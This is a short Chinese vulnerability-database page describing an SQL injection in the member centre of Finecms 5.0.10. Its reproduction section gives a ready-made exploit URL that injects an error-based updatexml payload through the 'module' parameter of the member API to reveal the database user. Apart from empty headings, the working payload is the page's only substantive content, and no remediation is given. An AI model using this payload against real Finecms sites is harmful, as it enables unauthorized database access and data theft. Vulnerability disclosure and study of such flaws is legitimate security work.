Finecms_5.0.10_会员中心sql注入漏洞-棉花糖会员站

Finecms_5.0.10_会员中心sql注入漏洞

7月15日发布

0150

# Finecms 5.0.10 会员中心sql注入漏洞

==================================

一、漏洞简介
————

二、漏洞影响
————

Finecms 5.0.10

三、复现过程
————

http://0-sec.org/index.php?s=member&c=api&m=checktitle&id=1&title=1&module=news,(select%20(updatexml(1,concat(1,(select%20user()),0x7e),1)))a

![](/static/qingy/Finecms_5.0.10_会员中心sql注入漏洞/img/rId24.png)

© 版权声明

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

喜欢就支持一下吧

相关推荐

评论抢沙发

请登录后发表评论

请登录后查看评论内容